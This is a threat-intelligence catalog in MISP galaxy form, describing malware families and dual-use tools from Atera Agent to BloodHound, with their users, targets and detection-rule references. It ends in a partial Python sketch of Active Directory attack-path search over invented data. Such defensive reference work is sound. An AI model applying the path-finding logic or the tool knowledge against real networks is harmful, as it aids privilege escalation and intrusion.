tags | ['85a29262-64bd-443c-9e08-3ee26aac859b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type | ['tool']

Atera Agent

Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.[U.S. CISA PaperCut May 2023]

Internal MISP references

UUID f8113a9f-a706-46df-8370-a9cef1c75f30 which can be used as unique global reference for Atera Agent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5014
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '9a5ed991-6fe7-49fe-8536-91defc449b18', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

Attor

Attor is a Windows-based espionage platform that has been seen in use since 2013. Attor has a loadable plugin architecture to customize functionality for specific targets.[ESET Attor Oct 2019]

Internal MISP references

UUID 89c35e9f-b435-4f58-9073-f24c1ee8754f which can be used as unique global reference for Attor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0438
source MITRE
type ['malware']

AuditCred

AuditCred is a malicious DLL that has been used by Lazarus Group during their 2018 attacks.[TrendMicro Lazarus Nov 2018]

Internal MISP references

UUID d0c25f14-5eb3-40c1-a890-2ab1349dff53 which can be used as unique global reference for AuditCred in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0347
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

AutoIt backdoor

AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [Forcepoint Monsoon] The malware is built on the legitimate scripting language of the same name, which is used for Windows GUI automation.

Internal MISP references

UUID 3f927596-5219-49eb-bd0d-57068b0e04ed which can be used as unique global reference for AutoIt backdoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0129
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Automim

Researchers describe Automim as a "collection of .cmd, .vbs and .bat files that automate the execution" of the Mimikatz and LaZagne credential harvesting tools.[CrowdStrike Endpoint Security Testing Oct 2021]

Internal MISP references

UUID 984249bd-6421-4133-bd2a-25f330b4b441 which can be used as unique global reference for Automim in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5277
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type ['tool']
Related clusters

To see the related clusters, click here.

AuTo Stealer

AuTo Stealer is malware written in C++ that has been used by SideCopy since at least December 2021 to target government agencies and personnel in India and Afghanistan.[MalwareBytes SideCopy Dec 2021]

Internal MISP references

UUID 649a4cfc-c0d0-412d-a28c-1bd4ed604ea8 which can be used as unique global reference for AuTo Stealer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1029
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

Avaddon

Avaddon is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.[Awake Security Avaddon][Arxiv Avaddon Feb 2021]

Internal MISP references

UUID bad92974-35f6-4183-8024-b629140c6ee6 which can be used as unique global reference for Avaddon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0640
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Avenger

Avenger is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]

Internal MISP references

UUID e5ca0192-e905-46a1-abef-ce1119c1f967 which can be used as unique global reference for Avenger in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0473
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

AvosLocker

AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[Malwarebytes AvosLocker Jul 2021][Trend Micro AvosLocker Apr 2022][Joint CSA AvosLocker Mar 2022]

Internal MISP references

UUID e792dc8d-b0f4-5916-8850-a61ff53125d0 which can be used as unique global reference for AvosLocker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S1053
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'c3779a84-8132-4c62-be2f-9312ad41c273', 'ce9f1048-09c1-49b0-a109-dd604afbf3cd', 'fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b', '9e4936f0-e3b7-4721-a638-58b2d093b2f2', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Azorult

Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [Unit42 Azorult Nov 2018][Proofpoint Azorult July 2018]

Internal MISP references

UUID cc68a7f0-c955-465f-bee0-2dacbb179078 which can be used as unique global reference for Azorult in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0344
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Babuk

Babuk is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of Babuk employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[Sogeti CERT ESEC Babuk March 2021][McAfee Babuk February 2021][CyberScoop Babuk February 2021]

Internal MISP references

UUID 0dc07eb9-66df-4116-b1bc-7020ca6395a1 which can be used as unique global reference for Babuk in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0638
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b5962a84-f1c7-4d0d-985c-86301db95129', '12124060-8392-49a3-b7b7-1dde3ebc8e67', '915e7ac2-b266-45d7-945c-cb04327d6246', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'a2e000da-8181-4327-bacd-32013dbd3654']
type ['malware']

BabyShark

BabyShark is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. [Unit42 BabyShark Feb 2019]

Internal MISP references

UUID ebb824a2-abff-4bfd-87f0-d63cb02b62e6 which can be used as unique global reference for BabyShark in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0414
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

BackConfig

BackConfig is a custom Trojan with a flexible plugin architecture that has been used by Patchwork.[Unit 42 BackConfig May 2020]

Internal MISP references

UUID 2763ad8c-cf4e-42eb-88db-a40ff8f96cf9 which can be used as unique global reference for BackConfig in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0475
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Backdoor.Oldrea

Backdoor.Oldrea is a modular backdoor that has been used by Dragonfly against energy companies since at least 2013. Backdoor.Oldrea was distributed via supply chain compromise and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[Symantec Dragonfly][Gigamon Berserk Bear October 2021][Symantec Dragonfly Sept 2017]

Internal MISP references

UUID f7cc5974-767c-4cb4-acc7-36295a386ce5 which can be used as unique global reference for Backdoor.Oldrea in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0093
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BACKSPACE

BACKSPACE is a backdoor used by APT30 that dates back to at least 2005. [FireEye APT30]

Internal MISP references

UUID d0daaa00-68e1-4568-bb08-3f28bcd82c63 which can be used as unique global reference for BACKSPACE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0031
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Backstab

Backstab is a tool used to terminate antimalware-protected processes.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 5a9a7a54-21cb-4a5c-bef0-d37f8678bf46 which can be used as unique global reference for Backstab in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5026
source Tidal Cyber
tags ['d469efcf-4feb-4149-9c0f-c4b7821960bd', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

BADCALL

BADCALL is a Trojan malware variant used by Lazarus Group. [US-CERT BADCALL]

Internal MISP references

UUID d7aa53a5-0912-4952-8f7f-55698e933c3b which can be used as unique global reference for BADCALL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0245
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BADFLICK

BADFLICK is a backdoor used by Leviathan in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.[FireEye Periscope March 2018][Accenture MUDCARP March 2019]

Internal MISP references

UUID 8c454294-81cb-45d0-b299-818994ad3e6f which can be used as unique global reference for BADFLICK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0642
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

BADHATCH

BADHATCH is a backdoor that has been utilized by FIN8 since at least 2019. BADHATCH has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.[Gigamon BADHATCH Jul 2019][BitDefender BADHATCH Mar 2021]

Internal MISP references

UUID 16481e0f-49d5-54c1-a1fe-16d9e7f8d08c which can be used as unique global reference for BADHATCH in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1081
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BADNEWS

BADNEWS is malware that has been used by the actors responsible for the Patchwork campaign. It is so named because it uses RSS feeds, forums, and blogs for command and control. [Forcepoint Monsoon] [TrendMicro Patchwork Dec 2017]

Internal MISP references

UUID 34c24d27-c779-42a4-9f61-3f0d3fea6fd4 which can be used as unique global reference for BADNEWS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0128
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BadPatch

BadPatch is a Windows Trojan that was used in a Gaza Hackers-linked campaign.[Unit 42 BadPatch Oct 2017]

Internal MISP references

UUID 10e76722-4b52-47f6-9276-70e95fecb26b which can be used as unique global reference for BadPatch in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0337
source MITRE
type ['malware']

Bad Rabbit

Bad Rabbit is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. Bad Rabbit has also targeted organizations and consumers in Russia. [Secure List Bad Rabbit][ESET Bad Rabbit][Dragos IT ICS Ransomware]

Internal MISP references

UUID a1d86d8f-fa48-43aa-9833-7355750e455c which can be used as unique global reference for Bad Rabbit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0606
source MITRE
tags ['5a463cb3-451d-47f7-93e4-1886150697ce', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Bandook

Bandook is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. Bandook has been used by Dark Caracal, as well as in a separate campaign referred to as "Operation Manul".[EFF Manul Aug 2016][Lookout Dark Caracal Jan 2018][CheckPoint Bandook Nov 2020]

Internal MISP references

UUID 5c0f8c35-88ff-40a1-977a-af5ce534e932 which can be used as unique global reference for Bandook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0234
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Bankshot

Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector. [McAfee Bankshot]

Internal MISP references

UUID 24b8471d-698f-48cc-b47a-8fbbaf28b293 which can be used as unique global reference for Bankshot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0239
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

Bash

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: File used by Windows subsystem for Linux

Author: Oddvar Moe

Paths:
* C:\Windows\System32\bash.exe
* C:\Windows\SysWOW64\bash.exe

Resources:
* https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_bash.yml
* IOC: Child process from bash.exe[Bash.exe - LOLBAS Project]

Internal MISP references

UUID cef3a09e-22ca-43dc-ad4a-95741a3b85ff which can be used as unique global reference for Bash in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5086
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Bat Armor

Bat Armor is a tool used to generate .bat files using PowerShell scripts.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 628037d4-962d-4f58-b32d-241d739bc62d which can be used as unique global reference for Bat Armor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5027
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Bazar

Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[Cybereason Bazar July 2020]

Internal MISP references

UUID b35d9817-6ead-4dbd-a2fa-4b8e217f8eac which can be used as unique global reference for Bazar in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0534
source MITRE
tags ['818c3d93-c010-44f4-82bc-b63b4bc6c3c2', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

BBK

BBK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]

Internal MISP references

UUID 3daa5ae1-464e-4c0a-aa46-15264a2a0126 which can be used as unique global reference for BBK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0470
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

BBSRAT

BBSRAT is malware with remote access tool functionality that has been used in targeted compromises. [Palo Alto Networks BBSRAT]

Internal MISP references

UUID be4dab36-d499-4ac3-b204-5e309e3a5331 which can be used as unique global reference for BBSRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0127
source MITRE
type ['malware']

BendyBear

BendyBear is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, BendyBear shares a variety of features with Waterbear, malware previously attributed to the Chinese cyber espionage group BlackTech.[Unit42 BendyBear Feb 2021]

Internal MISP references

UUID a114a498-fcfd-4e0a-9d1e-e26750d71af8 which can be used as unique global reference for BendyBear in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0574
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

Bginfo

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Background Information Utility included with SysInternals Suite

Author: Oddvar Moe

Paths:
* No fixed path

Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

Detection:
* Sigma: proc_creation_win_lolbin_bginfo.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Bginfo.exe - LOLBAS Project]

Internal MISP references

UUID fe926654-0cff-4e8e-b192-2fa1eb8a9a67 which can be used as unique global reference for Bginfo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5207
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

BianLian Ransomware (Backdoor)

This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023][BianLian Ransomware Gang Gives It a Go! | [redacted]]

Delivers: TeamViewer[U.S. CISA BianLian Ransomware May 2023], Atera Agent[U.S. CISA BianLian Ransomware May 2023], Splashtop[U.S. CISA BianLian Ransomware May 2023], AnyDesk[U.S. CISA BianLian Ransomware May 2023]

Internal MISP references

UUID a4fb341d-8010-433f-b8f1-a8781f961435 which can be used as unique global reference for BianLian Ransomware (Backdoor) in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5001
source Tidal Cyber
tags ['35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

BISCUIT

BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [Mandiant APT1]

Internal MISP references

UUID 3ad98097-2d10-4aa1-9594-7e74828a3643 which can be used as unique global reference for BISCUIT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0017
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Bisonal

Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[Unit 42 Bisonal July 2018][Talos Bisonal Mar 2020]

Internal MISP references

UUID b898816e-610f-4c2f-9045-d9f28a54ee58 which can be used as unique global reference for Bisonal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0268
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

BitPaymer

BitPaymer is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. BitPaymer uses a unique encryption key, ransom note, and contact information for each operation. BitPaymer has several indicators suggesting overlap with the Dridex malware and is often delivered via Dridex.[Crowdstrike Indrik November 2018]

Internal MISP references

UUID e7dec940-8701-4c06-9865-5b11c61c046d which can be used as unique global reference for BitPaymer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0570
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

BITSAdmin

BITSAdmin is a command line tool used to create and manage BITS Jobs. [Microsoft BITSAdmin]

Internal MISP references

UUID 52a20d3d-1edd-4f17-87f0-b77c67d260b4 which can be used as unique global reference for BITSAdmin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0190
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '10d09438-9ea5-405d-9b3a-36d351b5a5d9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Black Basta

Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMware ESXi servers. Black Basta operations have included the double extortion technique, where, in addition to demanding ransom for decrypting the files of targeted organizations, the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess that the Black Basta RaaS operators could include current or former members of the Conti group.[Palo Alto Networks Black Basta August 2022][Deep Instinct Black Basta August 2022][Minerva Labs Black Basta May 2022][Avertium Black Basta June 2022][NCC Group Black Basta June 2022][Cyble Black Basta May 2022]

Internal MISP references

UUID 0d5b24ba-68dc-50fa-8268-3012180fe374 which can be used as unique global reference for Black Basta in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1070
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

BlackCat

BlackCat is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[Microsoft BlackCat Jun 2022][Sophos BlackCat Jul 2022][ACSC BlackCat Apr 2022]

Internal MISP references

UUID 691369e5-ef74-5ff9-bc20-34efeb4b6c5b which can be used as unique global reference for BlackCat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S1068
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

BLACKCOFFEE

BLACKCOFFEE is malware that has been used by several Chinese groups since at least 2013. [FireEye APT17] [FireEye Periscope March 2018]

Internal MISP references

UUID e85e2fca-9347-4448-bfc1-342f29d5d6a1 which can be used as unique global reference for BLACKCOFFEE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0069
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BlackEnergy

BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [F-Secure BlackEnergy 2014]

Internal MISP references

UUID 908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f which can be used as unique global reference for BlackEnergy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0089
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BlackMould

BlackMould is a web shell based on China Chopper for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by GALLIUM against telecommunication providers.[Microsoft GALLIUM December 2019]

Internal MISP references

UUID da348a51-d047-4144-9ba4-34d2ce964a11 which can be used as unique global reference for BlackMould in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0564
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BLINDINGCAN

BLINDINGCAN is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.[US-CERT BLINDINGCAN Aug 2020][NHS UK BLINDINGCAN Aug 2020]

Internal MISP references

UUID 1af8ea81-40df-4fba-8d63-1858b8b31217 which can be used as unique global reference for BLINDINGCAN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0520
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BloodHound

BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[GitHub Bloodhound][CrowdStrike BloodHound April 2018][FoxIT Wocao December 2019]
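The attack-path analysis described above can be reduced to a graph search. The block below is an added illustration, not BloodHound's own code or data model: AD objects are nodes, control relationships are directed edges, and a breadth-first search returns the shortest chain from a low-privileged user to a high-value group. Every object, edge and relationship name in it is invented for the example.

```python
"""Attack-path search over a constructed Active Directory relationship graph.

Added illustration of the analysis BloodHound automates: AD objects become nodes,
control relationships (group membership, local admin rights, logged-on sessions,
ACL rights) become directed edges, and a breadth-first search returns the
shortest chain from a low-privileged principal to a high-value target.
Every object, edge and relationship name below is invented for this example.
"""
from collections import deque

# Constructed edges (source, relationship, target): "source can reach/control target".
# Direction follows the usual convention: MemberOf goes member -> group, AdminTo goes
# principal -> computer, HasSession goes computer -> user whose credentials are in
# memory there, GenericAll goes right-holder -> object it fully controls.
EDGES = [
    ("alice@corp.local", "MemberOf", "HELPDESK@corp.local"),
    ("HELPDESK@corp.local", "MemberOf", "REMOTE SUPPORT@corp.local"),
    ("HELPDESK@corp.local", "AdminTo", "WS01.corp.local"),
    ("REMOTE SUPPORT@corp.local", "AdminTo", "WS01.corp.local"),
    ("WS01.corp.local", "HasSession", "dave@corp.local"),
    ("dave@corp.local", "MemberOf", "IT-ADMINS@corp.local"),
    ("IT-ADMINS@corp.local", "GenericAll", "DOMAIN ADMINS@corp.local"),
    ("bob@corp.local", "MemberOf", "SALES@corp.local"),
    ("SALES@corp.local", "CanRDP", "WS02.corp.local"),
]
TARGET = "DOMAIN ADMINS@corp.local"


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, goal):
    """BFS over directed edges; returns [(src, rel, dst), ...] or None if unreachable."""
    if start not in graph:
        return None
    parent = {start: None}
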